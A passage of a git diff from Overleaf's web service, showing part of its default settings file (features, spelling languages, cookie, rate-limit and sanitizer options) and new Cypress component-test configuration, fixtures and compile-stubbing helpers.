features that are enabled by default for new + // new users. 
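+  // (Overrides are applied via module.exports.mergeWith(overrides), defined at
+  // the bottom of this file, e.g. mergeWith({ defaultFeatures: { compileTimeout: 60 } }).)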
+ defaultFeatures: (defaultFeatures = { + collaborators: -1, + dropbox: true, + github: true, + gitBridge: true, + versioning: true, + compileTimeout: 180, + compileGroup: 'standard', + references: true, + trackChanges: true, + }), + + // featuresEpoch: 'YYYY-MM-DD', + + features: { + personal: defaultFeatures, + }, + + groupPlanModalOptions: { + plan_codes: [], + currencies: [], + sizes: [], + usages: [], + }, + plans: [ + { + planCode: 'personal', + name: 'Personal', + price_in_cents: 0, + features: defaultFeatures, + }, + ], + + disableChat: process.env.OVERLEAF_DISABLE_CHAT === 'true', + enableSubscriptions: false, + restrictedCountries: [], + enableOnboardingEmails: process.env.ENABLE_ONBOARDING_EMAILS === 'true', + + enabledLinkedFileTypes: (process.env.ENABLED_LINKED_FILE_TYPES || '').split( + ',' + ), + + // i18n + // ------ + // + i18n: { + checkForHTMLInVars: process.env.I18N_CHECK_FOR_HTML_IN_VARS === 'true', + escapeHTMLInVars: process.env.I18N_ESCAPE_HTML_IN_VARS === 'true', + subdomainLang: { + www: { lngCode: 'en', url: siteUrl }, + }, + defaultLng: 'en', + }, + + // Spelling languages + // dic = available in client + // server: false = not available on server + // ------------------ + languages: [ + { code: 'en', name: 'English' }, + { code: 'en_US', dic: 'en_US', name: 'English (American)' }, + { code: 'en_GB', dic: 'en_GB', name: 'English (British)' }, + { code: 'en_CA', dic: 'en_CA', name: 'English (Canadian)' }, + { + code: 'en_AU', + dic: 'en_AU', + name: 'English (Australian)', + server: false, + }, + { + code: 'en_ZA', + dic: 'en_ZA', + name: 'English (South African)', + server: false, + }, + { code: 'af', dic: 'af_ZA', name: 'Afrikaans' }, + { code: 'an', dic: 'an_ES', name: 'Aragonese', server: false }, + { code: 'ar', dic: 'ar', name: 'Arabic' }, + { code: 'be_BY', dic: 'be_BY', name: 'Belarusian', server: false }, + { code: 'eu', dic: 'eu', name: 'Basque' }, + { code: 'bn_BD', dic: 'bn_BD', name: 'Bengali', server: false }, + { code: 'bs_BA', dic: 'bs_BA', name: 'Bosnian', server: false }, + { code: 'br', dic: 'br_FR', name: 'Breton' }, + { code: 'bg', dic: 'bg_BG', name: 'Bulgarian' }, + { code: 'ca', dic: 'ca', name: 'Catalan' }, + { code: 'hr', dic: 'hr_HR', name: 'Croatian' }, + { code: 'cs', dic: 'cs_CZ', name: 'Czech' }, + { code: 'da', dic: 'da_DK', name: 'Danish' }, + { code: 'nl', dic: 'nl', name: 'Dutch' }, + { code: 'dz', dic: 'dz', name: 'Dzongkha', server: false }, + { code: 'eo', dic: 'eo', name: 'Esperanto' }, + { code: 'et', dic: 'et_EE', name: 'Estonian' }, + { code: 'fo', dic: 'fo', name: 'Faroese' }, + { code: 'fr', dic: 'fr', name: 'French' }, + { code: 'gl', dic: 'gl_ES', name: 'Galician' }, + { code: 'de', dic: 'de_DE', name: 'German' }, + { code: 'de_AT', dic: 'de_AT', name: 'German (Austria)', server: false }, + { + code: 'de_CH', + dic: 'de_CH', + name: 'German (Switzerland)', + server: false, + }, + { code: 'el', dic: 'el_GR', name: 'Greek' }, + { code: 'gug_PY', dic: 'gug_PY', name: 'Guarani', server: false }, + { code: 'gu_IN', dic: 'gu_IN', name: 'Gujarati', server: false }, + { code: 'he_IL', dic: 'he_IL', name: 'Hebrew', server: false }, + { code: 'hi_IN', dic: 'hi_IN', name: 'Hindi', server: false }, + { code: 'hu_HU', dic: 'hu_HU', name: 'Hungarian', server: false }, + { code: 'is_IS', dic: 'is_IS', name: 'Icelandic', server: false }, + { code: 'id', dic: 'id_ID', name: 'Indonesian' }, + { code: 'ga', dic: 'ga_IE', name: 'Irish' }, + { code: 'it', dic: 'it_IT', name: 'Italian' }, + { code: 'kk', dic: 'kk_KZ', name: 'Kazakh' }, + { 
code: 'ko', dic: 'ko', name: 'Korean', server: false }, + { code: 'ku', name: 'Kurdish' }, + { code: 'kmr', dic: 'kmr_Latn', name: 'Kurmanji', server: false }, + { code: 'lv', dic: 'lv_LV', name: 'Latvian' }, + { code: 'lt', dic: 'lt_LT', name: 'Lithuanian' }, + { code: 'lo_LA', dic: 'lo_LA', name: 'Laotian', server: false }, + { code: 'ml_IN', dic: 'ml_IN', name: 'Malayalam', server: false }, + { code: 'mn_MN', dic: 'mn_MN', name: 'Mongolian', server: false }, + { code: 'nr', name: 'Ndebele' }, + { code: 'ne_NP', dic: 'ne_NP', name: 'Nepali', server: false }, + { code: 'ns', name: 'Northern Sotho' }, + { code: 'no', name: 'Norwegian' }, + { code: 'nb_NO', dic: 'nb_NO', name: 'Norwegian (Bokmål)', server: false }, + { code: 'nn_NO', dic: 'nn_NO', name: 'Norwegian (Nynorsk)', server: false }, + { code: 'oc_FR', dic: 'oc_FR', name: 'Occitan', server: false }, + { code: 'fa', dic: 'fa_IR', name: 'Persian' }, + { code: 'pl', dic: 'pl_PL', name: 'Polish' }, + { code: 'pt_BR', dic: 'pt_BR', name: 'Portuguese (Brazilian)' }, + { + code: 'pt_PT', + dic: 'pt_PT', + name: 'Portuguese (European)', + }, + { code: 'pa', name: 'Punjabi' }, + { code: 'ro', dic: 'ro_RO', name: 'Romanian' }, + { code: 'ru', dic: 'ru_RU', name: 'Russian' }, + { code: 'gd_GB', dic: 'gd_GB', name: 'Scottish Gaelic', server: false }, + { code: 'sr_RS', dic: 'sr_RS', name: 'Serbian', server: false }, + { code: 'si_LK', dic: 'si_LK', name: 'Sinhala', server: false }, + { code: 'sk', dic: 'sk_SK', name: 'Slovak' }, + { code: 'sl', dic: 'sl_SI', name: 'Slovenian' }, + { code: 'st', name: 'Southern Sotho' }, + { code: 'es', dic: 'es_ES', name: 'Spanish' }, + { code: 'sw_TZ', dic: 'sw_TZ', name: 'Swahili', server: false }, + { code: 'sv', dic: 'sv_SE', name: 'Swedish' }, + { code: 'tl', dic: 'tl', name: 'Tagalog' }, + { code: 'te_IN', dic: 'te_IN', name: 'Telugu', server: false }, + { code: 'th_TH', dic: 'th_TH', name: 'Thai', server: false }, + { code: 'bo', dic: 'bo', name: 'Tibetan', server: false }, + { code: 'ts', name: 'Tsonga' }, + { code: 'tn', name: 'Tswana' }, + { code: 'tr_TR', dic: 'tr_TR', name: 'Turkish', server: false }, + { code: 'uk_UA', dic: 'uk_UA', name: 'Ukrainian', server: false }, + { code: 'hsb', name: 'Upper Sorbian' }, + { code: 'uz_UZ', dic: 'uz_UZ', name: 'Uzbek', server: false }, + { code: 'vi_VN', dic: 'vi_VN', name: 'Vietnamese', server: false }, + { code: 'cy', name: 'Welsh' }, + { code: 'xh', name: 'Xhosa' }, + ], + + translatedLanguages: { + cn: '简体中文', + cs: 'Čeština', + da: 'Dansk', + de: 'Deutsch', + en: 'English', + es: 'Español', + fi: 'Suomi', + fr: 'Français', + it: 'Italiano', + ja: '日本語', + ko: '한국어', + nl: 'Nederlands', + no: 'Norsk', + pl: 'Polski', + pt: 'Português', + ro: 'Română', + ru: 'Русский', + sv: 'Svenska', + tr: 'Türkçe', + uk: 'Українська', + 'zh-CN': '简体中文', + }, + + maxDictionarySize: 1024 * 1024, // 1 MB + + // Password Settings + // ----------- + // These restrict the passwords users can use when registering + // opts are from http://antelle.github.io/passfield + passwordStrengthOptions: { + length: { + min: 8, + // Bcrypt does not support longer passwords than that. 
+ max: 72, + }, + }, + + elevateAccountSecurityAfterFailedLogin: + parseInt(process.env.ELEVATED_ACCOUNT_SECURITY_AFTER_FAILED_LOGIN_MS, 10) || + 24 * 60 * 60 * 1000, + + deviceHistory: { + cookieName: process.env.DEVICE_HISTORY_COOKIE_NAME || 'deviceHistory', + entryExpiry: + parseInt(process.env.DEVICE_HISTORY_ENTRY_EXPIRY_MS, 10) || + 90 * 24 * 60 * 60 * 1000, + maxEntries: parseInt(process.env.DEVICE_HISTORY_MAX_ENTRIES, 10) || 10, + secret: process.env.DEVICE_HISTORY_SECRET, + }, + + // Email support + // ------------- + // + // Overleaf uses nodemailer (http://www.nodemailer.com/) to send transactional emails. + // To see the range of transport and options they support, see http://www.nodemailer.com/docs/transports + // email: + // fromAddress: "" + // replyTo: "" + // lifecycle: false + // # Example transport and parameter settings for Amazon SES + // transport: "SES" + // parameters: + // AWSAccessKeyID: "" + // AWSSecretKey: "" + + // For legacy reasons, we need to populate this object. + sentry: {}, + + // Production Settings + // ------------------- + debugPugTemplates: process.env.DEBUG_PUG_TEMPLATES === 'true', + precompilePugTemplatesAtBootTime: process.env + .PRECOMPILE_PUG_TEMPLATES_AT_BOOT_TIME + ? process.env.PRECOMPILE_PUG_TEMPLATES_AT_BOOT_TIME === 'true' + : process.env.NODE_ENV === 'production', + + // Should javascript assets be served minified or not. + useMinifiedJs: process.env.MINIFIED_JS === 'true' || false, + + // Should static assets be sent with a header to tell the browser to cache + // them. + cacheStaticAssets: false, + + // If you are running Overleaf over https, set this to true to send the + // cookie with a secure flag (recommended). + secureCookie: false, + + // 'SameSite' cookie setting. Can be set to 'lax', 'none' or 'strict' + // 'lax' is recommended, as 'strict' will prevent people linking to projects + // https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-03#section-4.1.2.7 + sameSiteCookie: 'lax', + + // If you are running Overleaf behind a proxy (like Apache, Nginx, etc) + // then set this to true to allow it to correctly detect the forwarded IP + // address and http/https protocol information. + behindProxy: false, + + // Delay before closing the http server upon receiving a SIGTERM process signal. + gracefulShutdownDelayInMs: + parseInt(process.env.GRACEFUL_SHUTDOWN_DELAY_SECONDS ?? '5', 10) * seconds, + + maxReconnectGracefullyIntervalMs: parseInt( + process.env.MAX_RECONNECT_GRACEFULLY_INTERVAL_MS ?? '30000', + 10 + ), + + // Expose the hostname in the `X-Served-By` response header + exposeHostname: process.env.EXPOSE_HOSTNAME === 'true', + + // Cookie max age (in milliseconds). Set to false for a browser session. + cookieSessionLength: 5 * 24 * 60 * 60 * 1000, // 5 days + + // When true, only allow invites to be sent to email addresses that + // already have user accounts + restrictInvitesToExistingAccounts: false, + + // Should we allow access to any page without logging in? This includes + // public projects, /learn, /templates, about pages, etc. 
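+  // e.g. set OVERLEAF_ALLOW_PUBLIC_ACCESS=true to turn this on.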
+ allowPublicAccess: process.env.OVERLEAF_ALLOW_PUBLIC_ACCESS === 'true', + + // editor should be open by default + editorIsOpen: process.env.EDITOR_OPEN !== 'false', + + // site should be open by default + siteIsOpen: process.env.SITE_OPEN !== 'false', + // status file for closing/opening the site at run-time, polled every 5s + siteMaintenanceFile: process.env.SITE_MAINTENANCE_FILE, + + // Use a single compile directory for all users in a project + // (otherwise each user has their own directory) + // disablePerUserCompiles: true + + // Domain the client (pdfjs) should download the compiled pdf from + pdfDownloadDomain: process.env.COMPILES_USER_CONTENT_DOMAIN, // "http://clsi-lb:3014" + + // By default turn on feature flag, can be overridden per request. + enablePdfCaching: process.env.ENABLE_PDF_CACHING === 'true', + + // Maximum size of text documents in the real-time editing system. + max_doc_length: 2 * 1024 * 1024, // 2mb + + primary_email_check_expiration: 1000 * 60 * 60 * 24 * 90, // 90 days + + // Maximum JSON size in HTTP requests + // We should be able to process twice the max doc length, to allow for + // - the doc content + // - text ranges spanning the whole doc + // + // There's also overhead required for the JSON encoding and the UTF-8 encoding, + // theoretically up to 3 times the max doc length. On the other hand, we don't + // want to block the event loop with JSON parsing, so we try to find a + // practical compromise. + max_json_request_size: + parseInt(process.env.MAX_JSON_REQUEST_SIZE) || 6 * 1024 * 1024, // 6 MB + + // Internal configs + // ---------------- + path: { + // If we ever need to write something to disk (e.g. incoming requests + // that need processing but may be too big for memory, then write + // them to disk here). + dumpFolder: Path.resolve(__dirname, '../data/dumpFolder'), + uploadFolder: Path.resolve(__dirname, '../data/uploads'), + }, + + // Automatic Snapshots + // ------------------- + automaticSnapshots: { + // How long should we wait after the user last edited to + // take a snapshot? + waitTimeAfterLastEdit: 5 * minutes, + // Even if edits are still taking place, this is maximum + // time to wait before taking another snapshot. + maxTimeBetweenSnapshots: 30 * minutes, + }, + + // Smoke test + // ---------- + // Provide log in credentials and a project to be able to run + // some basic smoke tests to check the core functionality. + // + smokeTest: { + user: process.env.SMOKE_TEST_USER, + userId: process.env.SMOKE_TEST_USER_ID, + password: process.env.SMOKE_TEST_PASSWORD, + projectId: process.env.SMOKE_TEST_PROJECT_ID, + rateLimitSubject: process.env.SMOKE_TEST_RATE_LIMIT_SUBJECT || '127.0.0.1', + stepTimeout: parseInt(process.env.SMOKE_TEST_STEP_TIMEOUT || '10000', 10), + }, + + appName: process.env.APP_NAME || 'Overleaf (Community Edition)', + + adminEmail: process.env.ADMIN_EMAIL || 'placeholder@example.com', + adminDomains: process.env.ADMIN_DOMAINS + ? 
JSON.parse(process.env.ADMIN_DOMAINS) + : undefined, + + nav: { + title: process.env.APP_NAME || 'Overleaf Community Edition', + + hide_powered_by: process.env.NAV_HIDE_POWERED_BY === 'true', + left_footer: [], + + right_footer: [ + { + text: " Fork on GitHub!", + url: 'https://github.com/overleaf/overleaf', + }, + ], + + showSubscriptionLink: false, + + header_extras: [], + }, + // Example: + // header_extras: [{text: "Some Page", url: "http://example.com/some/page", class: "subdued"}] + + recaptcha: { + endpoint: + process.env.RECAPTCHA_ENDPOINT || + 'https://www.google.com/recaptcha/api/siteverify', + trustedUsers: (process.env.CAPTCHA_TRUSTED_USERS || '') + .split(',') + .map(x => x.trim()) + .filter(x => x !== ''), + trustedUsersRegex: process.env.CAPTCHA_TRUSTED_USERS_REGEX + ? // Enforce matching of the entire input. + new RegExp(`^${process.env.CAPTCHA_TRUSTED_USERS_REGEX}$`) + : null, + disabled: { + invite: true, + login: true, + passwordReset: true, + register: true, + addEmail: true, + }, + }, + + customisation: {}, + + redirects: { + '/templates/index': '/templates/', + }, + + reloadModuleViewsOnEachRequest: process.env.NODE_ENV === 'development', + + rateLimit: { + subnetRateLimiterDisabled: + process.env.SUBNET_RATE_LIMITER_DISABLED === 'true', + autoCompile: { + everyone: process.env.RATE_LIMIT_AUTO_COMPILE_EVERYONE || 100, + standard: process.env.RATE_LIMIT_AUTO_COMPILE_STANDARD || 25, + }, + login: { + ip: { points: 20, subnetPoints: 200, duration: 60 }, + email: { points: 10, duration: 120 }, + }, + }, + + analytics: { + enabled: false, + }, + + compileBodySizeLimitMb: process.env.COMPILE_BODY_SIZE_LIMIT_MB || 7, + + textExtensions: defaultTextExtensions.concat( + parseTextExtensions(process.env.ADDITIONAL_TEXT_EXTENSIONS) + ), + + // case-insensitive file names that is editable (doc) in the editor + editableFilenames: ['latexmkrc', '.latexmkrc', 'makefile', 'gnumakefile'], + + fileIgnorePattern: + process.env.FILE_IGNORE_PATTERN || + '**/{{__MACOSX,.git,.texpadtmp,.R}{,/**},.!(latexmkrc),*.{dvi,aux,log,toc,out,pdfsync,synctex,synctex(busy),fdb_latexmk,fls,nlo,ind,glo,gls,glg,bbl,blg,doc,docx,gz,swp}}', + + validRootDocExtensions: ['tex', 'Rtex', 'ltx', 'Rnw'], + + emailConfirmationDisabled: + process.env.EMAIL_CONFIRMATION_DISABLED === 'true' || false, + + emailAddressLimit: intFromEnv('EMAIL_ADDRESS_LIMIT', 10), + + enabledServices: (process.env.ENABLED_SERVICES || 'web,api') + .split(',') + .map(s => s.trim()), + + // module options + // ---------- + modules: { + sanitize: { + options: { + allowedTags: [ + 'h1', + 'h2', + 'h3', + 'h4', + 'h5', + 'h6', + 'blockquote', + 'p', + 'a', + 'ul', + 'ol', + 'nl', + 'li', + 'b', + 'i', + 'strong', + 'em', + 'strike', + 'code', + 'hr', + 'br', + 'div', + 'table', + 'thead', + 'col', + 'caption', + 'tbody', + 'tr', + 'th', + 'td', + 'tfoot', + 'pre', + 'iframe', + 'img', + 'figure', + 'figcaption', + 'span', + 'source', + 'video', + 'del', + ], + allowedAttributes: { + a: [ + 'href', + 'name', + 'target', + 'class', + 'event-tracking', + 'event-tracking-ga', + 'event-tracking-label', + 'event-tracking-trigger', + ], + div: ['class', 'id', 'style'], + h1: ['class', 'id'], + h2: ['class', 'id'], + h3: ['class', 'id'], + h4: ['class', 'id'], + h5: ['class', 'id'], + h6: ['class', 'id'], + p: ['class'], + col: ['width'], + figure: ['class', 'id', 'style'], + figcaption: ['class', 'id', 'style'], + i: ['aria-hidden', 'aria-label', 'class', 'id'], + iframe: [ + 'allowfullscreen', + 'frameborder', + 'height', + 'src', + 'style', + 
'width', + ], + img: ['alt', 'class', 'src', 'style'], + source: ['src', 'type'], + span: ['class', 'id', 'style'], + strong: ['style'], + table: ['border', 'class', 'id', 'style'], + td: ['colspan', 'rowspan', 'headers', 'style'], + th: [ + 'abbr', + 'headers', + 'colspan', + 'rowspan', + 'scope', + 'sorted', + 'style', + ], + tr: ['class'], + video: ['alt', 'class', 'controls', 'height', 'width'], + }, + }, + }, + }, + + overleafModuleImports: { + // modules to import (an empty array for each set of modules) + // + // Restart webpack after making changes. + // + createFileModes: [], + devToolbar: [], + gitBridge: [], + publishModal: [], + tprFileViewInfo: [], + tprFileViewRefreshError: [], + tprFileViewRefreshButton: [], + tprFileViewNotOriginalImporter: [], + contactUsModal: [], + editorToolbarButtons: [], + sourceEditorExtensions: [], + sourceEditorComponents: [], + pdfLogEntryComponents: [], + pdfLogEntriesComponents: [], + diagnosticActions: [], + sourceEditorCompletionSources: [], + sourceEditorSymbolPalette: [], + sourceEditorToolbarComponents: [], + mainEditorLayoutModals: [], + langFeedbackLinkingWidgets: [], + labsExperiments: [], + integrationLinkingWidgets: [], + referenceLinkingWidgets: [], + importProjectFromGithubModalWrapper: [], + importProjectFromGithubMenu: [], + editorLeftMenuSync: [], + editorLeftMenuManageTemplate: [], + oauth2Server: [], + managedGroupSubscriptionEnrollmentNotification: [], + managedGroupEnrollmentInvite: [], + ssoCertificateInfo: [], + v1ImportDataScreen: [], + snapshotUtils: [], + usGovBanner: [], + offlineModeToolbarButtons: [], + settingsEntries: [], + autoCompleteExtensions: [], + sectionTitleGenerators: [], + toastGenerators: [], + editorSidebarComponents: [], + fileTreeToolbarComponents: [], + integrationPanelComponents: [], + referenceSearchSetting: [], + }, + + moduleImportSequence: [ + 'history-v1', + 'launchpad', + 'server-ce-scripts', + 'user-activate', + ], + viewIncludes: {}, + + csp: { + enabled: process.env.CSP_ENABLED === 'true', + reportOnly: process.env.CSP_REPORT_ONLY === 'true', + reportPercentage: parseFloat(process.env.CSP_REPORT_PERCENTAGE) || 0, + reportUri: process.env.CSP_REPORT_URI, + exclude: [], + viewDirectives: { + 'app/views/project/ide-react': [`img-src 'self' data: blob:`], + }, + }, + + unsupportedBrowsers: { + ie: '<=11', + safari: '<=14', + firefox: '<=78', + }, + + // ID of the IEEE brand in the rails app + ieeeBrandId: intFromEnv('IEEE_BRAND_ID', 15), + + managedUsers: { + enabled: false, + }, +} + +module.exports.mergeWith = function (overrides) { + return merge(overrides, module.exports) +} diff --git a/services/web/cypress.config.ts b/services/web/cypress.config.ts new file mode 100644 index 0000000..d44d9dc --- /dev/null +++ b/services/web/cypress.config.ts @@ -0,0 +1,28 @@ +import { defineConfig } from 'cypress' +import { webpackConfig } from './cypress/support/webpack.cypress' + +export default defineConfig({ + fixturesFolder: 'cypress/fixtures', + video: process.env.CYPRESS_VIDEO === 'true', + screenshotsFolder: 'cypress/results', + videosFolder: 'cypress/results', + viewportHeight: 800, + viewportWidth: 800, + component: { + devServer: { + framework: 'react', + bundler: 'webpack', + webpackConfig, + }, + setupNodeEvents(on, config) { + // + }, + specPattern: + process.env.CYPRESS_SPEC_PATTERN || + './{test,modules/**/test}/frontend/**/*.spec.{js,jsx,ts,tsx}', + excludeSpecPattern: process.env.CYPRESS_EXCLUDE_SPEC_PATTERN, + }, + retries: { + runMode: 3, + }, +}) diff --git 
a/services/web/cypress/fixtures/blobs/5199b66d9d1226551be436c66bad9d962cc05537 b/services/web/cypress/fixtures/blobs/5199b66d9d1226551be436c66bad9d962cc05537 new file mode 100644 index 0000000..3b1715e --- /dev/null +++ b/services/web/cypress/fixtures/blobs/5199b66d9d1226551be436c66bad9d962cc05537 @@ -0,0 +1 @@ +Simply use the section and subsection commands, as in this example document! With Overleaf, all the formatting and numbering is handled automatically according to the template you've chosen. If you're using the Visual Editor, you can also create new section and subsections via the buttons in the editor toolbar. diff --git a/services/web/cypress/fixtures/blobs/a0e21c740cf81e868f158e30e88985b5ea1d6c19 b/services/web/cypress/fixtures/blobs/a0e21c740cf81e868f158e30e88985b5ea1d6c19 new file mode 100644 index 0000000..ca81447 --- /dev/null +++ b/services/web/cypress/fixtures/blobs/a0e21c740cf81e868f158e30e88985b5ea1d6c19 @@ -0,0 +1,8 @@ +@article{greenwade93, + author = "George D. Greenwade", + title = "The {C}omprehensive {T}ex {A}rchive {N}etwork ({CTAN})", + year = "1993", + journal = "TUGBoat", + volume = "14", + number = "3", + pages = "342--351"} diff --git a/services/web/cypress/fixtures/build/mock-writefull-api.js b/services/web/cypress/fixtures/build/mock-writefull-api.js new file mode 100644 index 0000000..4ba52ba --- /dev/null +++ b/services/web/cypress/fixtures/build/mock-writefull-api.js @@ -0,0 +1 @@ +module.exports = {} diff --git a/services/web/cypress/fixtures/build/mock-writefull.css b/services/web/cypress/fixtures/build/mock-writefull.css new file mode 100644 index 0000000..e69de29 diff --git a/services/web/cypress/fixtures/build/output-2.pdf b/services/web/cypress/fixtures/build/output-2.pdf new file mode 100644 index 0000000..d9f89df Binary files /dev/null and b/services/web/cypress/fixtures/build/output-2.pdf differ diff --git a/services/web/cypress/fixtures/build/output-corrupt.pdf b/services/web/cypress/fixtures/build/output-corrupt.pdf new file mode 100644 index 0000000..8d92665 Binary files /dev/null and b/services/web/cypress/fixtures/build/output-corrupt.pdf differ diff --git a/services/web/cypress/fixtures/build/output-human-readable.log b/services/web/cypress/fixtures/build/output-human-readable.log new file mode 100644 index 0000000..af776aa --- /dev/null +++ b/services/web/cypress/fixtures/build/output-human-readable.log @@ -0,0 +1,21 @@ +log This is pdfTeX, Version 3.14159265-2.6-1.40.21 (TeX Live 2020) (preloaded format=pdflatex 2020.9.10) 8 FEB 2022 16:27 +entering extended mode + \write18 enabled. + %&-line parsing enabled. +**main.tex +(./main.tex +LaTeX2e <2020-02-02> patch level 5 + +LaTeX Warning: Reference `intorduction' on page 1 undefined on input line 11. + + +LaTeX Warning: Reference `section1' on page 1 undefined on input line 13. + +[1 + +{/usr/local/texlive/2020/texmf-var/fonts/map/pdftex/updmap/pdftex.map}] (/compi +le/output.aux) + +LaTeX Warning: There were undefined references. + + ) diff --git a/services/web/cypress/fixtures/build/output-undefined-references.log b/services/web/cypress/fixtures/build/output-undefined-references.log new file mode 100644 index 0000000..c2e4521 --- /dev/null +++ b/services/web/cypress/fixtures/build/output-undefined-references.log @@ -0,0 +1,10 @@ +Package rerunfilecheck Info: File `output.out' has not changed. +(rerunfilecheck) Checksum: 339DB29951BB30436898BC39909EA4FA;11265. + +Package rerunfilecheck Warning: File `output.brf' has changed. +(rerunfilecheck) Rerun to get bibliographical references right. 
+ +Package rerunfilecheck Info: Checksums for `output.brf': +(rerunfilecheck) Before: D41D8CD98F00B204E9800998ECF8427E;0 +(rerunfilecheck) After: DF3260FAD3828D54C5E4E9337E97F7AF;4841. +) diff --git a/services/web/cypress/fixtures/build/output.blg b/services/web/cypress/fixtures/build/output.blg new file mode 100644 index 0000000..dd54e20 --- /dev/null +++ b/services/web/cypress/fixtures/build/output.blg @@ -0,0 +1 @@ +This is BibTeX, Version 4.0 diff --git a/services/web/cypress/fixtures/build/output.log b/services/web/cypress/fixtures/build/output.log new file mode 100644 index 0000000..768a905 --- /dev/null +++ b/services/web/cypress/fixtures/build/output.log @@ -0,0 +1,19 @@ +The LaTeX compiler output + * With a lot of details + +Wrapped in an HTML
<pre> element with
    +      preformatted text which is to be presented exactly
    +            as written in the HTML file
    +
    +                                              (whitespace included™)
    +
    +The text is typically rendered using a non-proportional ("monospace") font.
    +
    +LaTeX Font Info:    External font `cmex10' loaded for size
    +(Font)              <7> on input line 18.
    +LaTeX Font Info:    External font `cmex10' loaded for size
    +(Font)              <5> on input line 18.
    +! Undefined control sequence.
    + \Zlpha
    +
    + main.tex, line 23
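The build/ fixtures above are consumed by the compile-interception helpers added below in services/web/cypress/support/shared/commands/compile.ts. A minimal usage sketch of those helpers in a component spec follows; 'PdfPreview' is a hypothetical component under test, and the helpers are assumed to be registered as Cypress commands, as the Chainable declarations in cypress/support/shared/commands/index.ts suggest:

describe('pdf preview', function () {
  it('renders output from a stubbed compile', function () {
    // stub the cached-output probe (404), the compile POST, and the
    // output.pdf / output.log / output.blg fixture downloads
    cy.interceptCompile({ prefix: 'compile', times: 1 })
    cy.mount(<PdfPreview />) // hypothetical component that triggers a compile
    // wait for the compile POST and each fixture download to be served
    cy.waitForCompile({ prefix: 'compile', pdf: true })
  })
})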
    diff --git a/services/web/cypress/fixtures/build/output.pdf b/services/web/cypress/fixtures/build/output.pdf
    new file mode 100644
    index 0000000..4c2cc85
    Binary files /dev/null and b/services/web/cypress/fixtures/build/output.pdf differ
    diff --git a/services/web/cypress/fixtures/images/gradient.png b/services/web/cypress/fixtures/images/gradient.png
    new file mode 100644
    index 0000000..a2152f9
    Binary files /dev/null and b/services/web/cypress/fixtures/images/gradient.png differ
    diff --git a/services/web/cypress/support/component-index.html b/services/web/cypress/support/component-index.html
    new file mode 100644
    index 0000000..ac6e79f
    --- /dev/null
    +++ b/services/web/cypress/support/component-index.html
    @@ -0,0 +1,12 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width,initial-scale=1.0">
+    <title>Components App</title>
+  </head>
+  <body>
+    <div data-cy-root></div>
    + + \ No newline at end of file diff --git a/services/web/cypress/support/component.ts b/services/web/cypress/support/component.ts new file mode 100644 index 0000000..9ded533 --- /dev/null +++ b/services/web/cypress/support/component.ts @@ -0,0 +1,12 @@ +import 'cypress-plugin-tab' +import { resetMeta } from './ct/window' // needs to be before i18n +import localesPromise from '@/i18n' +import './shared/commands' +import './shared/exceptions' +import './ct/commands' +import './ct/codemirror' +import '../../test/frontend/helpers/bootstrap-5' + +beforeEach(function () { + cy.wrap(localesPromise).then(resetMeta) +}) diff --git a/services/web/cypress/support/ct/codemirror.ts b/services/web/cypress/support/ct/codemirror.ts new file mode 100644 index 0000000..ab7a692 --- /dev/null +++ b/services/web/cypress/support/ct/codemirror.ts @@ -0,0 +1,4 @@ +import { EditorView } from '@codemirror/view' + +// @ts-ignore (disable EditContext-based editing until stable) +EditorView.EDIT_CONTEXT = false diff --git a/services/web/cypress/support/ct/commands/index.ts b/services/web/cypress/support/ct/commands/index.ts new file mode 100644 index 0000000..4ad9c79 --- /dev/null +++ b/services/web/cypress/support/ct/commands/index.ts @@ -0,0 +1,14 @@ +import { mount } from 'cypress/react' + +// eslint-disable-next-line no-unused-vars,@typescript-eslint/no-namespace +declare global { + // eslint-disable-next-line @typescript-eslint/no-namespace,no-unused-vars + namespace Cypress { + // eslint-disable-next-line no-unused-vars + interface Chainable { + mount: typeof mount + } + } +} + +Cypress.Commands.add('mount', mount) diff --git a/services/web/cypress/support/ct/window.ts b/services/web/cypress/support/ct/window.ts new file mode 100644 index 0000000..ae2a194 --- /dev/null +++ b/services/web/cypress/support/ct/window.ts @@ -0,0 +1,16 @@ +export function resetMeta() { + window.metaAttributesCache = new Map() + window.metaAttributesCache.set('ol-i18n', { currentLangCode: 'en' }) + window.metaAttributesCache.set('ol-ExposedSettings', { + appName: 'Overleaf', + validRootDocExtensions: ['tex', 'Rtex', 'ltx', 'Rnw'], + fileIgnorePattern: + '**/{{__MACOSX,.git,.texpadtmp,.R}{,/**},.!(latexmkrc),*.{dvi,aux,log,toc,out,pdfsync,synctex,synctex(busy),fdb_latexmk,fls,nlo,ind,glo,gls,glg,bbl,blg,doc,docx,gz,swp}}', + hasLinkedProjectFileFeature: true, + hasLinkedProjectOutputFileFeature: true, + hasLinkUrlFeature: true, + }) +} + +// Populate meta for top-level access in modules on import +resetMeta() diff --git a/services/web/cypress/support/shared/commands/compile.ts b/services/web/cypress/support/shared/commands/compile.ts new file mode 100644 index 0000000..9f7273c --- /dev/null +++ b/services/web/cypress/support/shared/commands/compile.ts @@ -0,0 +1,243 @@ +import { v4 as uuid } from 'uuid' + +const outputFiles = () => { + const build = uuid() + + return [ + { + path: 'output.pdf', + build, + url: `/build/${build}/output.pdf`, + type: 'pdf', + }, + { + path: 'output.bbl', + build, + url: `/build/${build}/output.bbl`, + type: 'bbl', + }, + { + path: 'output.bib', + build, + url: `/build/${build}/output.bib`, + type: 'bib', + }, + { + path: 'example.txt', + build, + url: `/build/${build}/example.txt`, + type: 'txt', + }, + { + path: 'output.log', + build, + url: `/build/${build}/output.log`, + type: 'log', + }, + { + path: 'output.blg', + build, + url: `/build/${build}/output.blg`, + type: 'blg', + }, + ] +} + +const compileFromCacheResponse = () => { + return { + fromCache: true, + status: 'success', + clsiServerId: 
